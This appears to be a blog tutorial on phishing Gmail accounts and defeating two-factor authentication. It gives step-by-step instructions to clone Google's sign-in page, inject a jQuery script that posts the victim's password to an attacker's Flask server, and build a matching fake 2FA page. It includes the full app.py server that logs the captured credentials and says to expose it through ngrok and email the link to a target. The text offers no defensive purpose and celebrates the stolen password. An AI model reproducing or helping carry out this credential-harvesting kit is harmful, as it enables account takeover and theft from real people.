How To Bypass Gmail 2FA

HOW TO BYPASS GMAIL 2FA

Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim.

REQUIREMENTS

1)KALI LINUX

2)SUBLIME TEXT EDITOR

3)NGROK

STEP 1:

Initially use your browser and search for google sign in.

STEP 2:

Type the mail id you wanna hack, after entering the mail id and click next.

Bypass Gmail 2Fa

STEP 3:

After entering the mail id and right click the mouse and click inspect.

How to Bypass Gmail 2Fa

STEP 4:

after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.

STEP 5:

paste it on sublime text editor and add some script at the end of the html tag.

ill drop the code here:

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
    $('button').click(function(e){
      e.preventDefault()
      auth=$('input[type=password]').val()
      $.post(
        "http://localhost:5000/auth",
        {"password":auth},
        function(data, status){
          window.location="http://localhost:5000/login"
        }
        );
      return false;
        })
</script>
</html>

save this file as login.html

NOTE: 

do it same for 2 factor authentication page 

STEP 6:

next we need to write a python code that fetch deets from victim. And save it as app.py

ill give the code below

app.py

#!/usr/bin/env python3

from flask import Flask, render_template, send_file, make_response, request

app = Flask(__name__)

@app.route(“/auth”, methods=[“POST”])

def auth():

    print(request.form.to_dict())

    return “ok”

@app.route(“/”)

def index():

    response = make_response(send_file(“templates/login.html”))

    response.headers.add(“Access-Control-Allow-Origin”, “*”)

    return response

@app.route(“/login”)

def login():

    return send_file(“templates/2fa.html”)

if __name__ == “__main__”:

    app.run()

STEP 7:

open terminal in linux and type as i did and configure the ngrok

ngrok command

STEP 8:

And send the link in  mail to victim, BOOM…….!!!! youve got a password.

Leave a Reply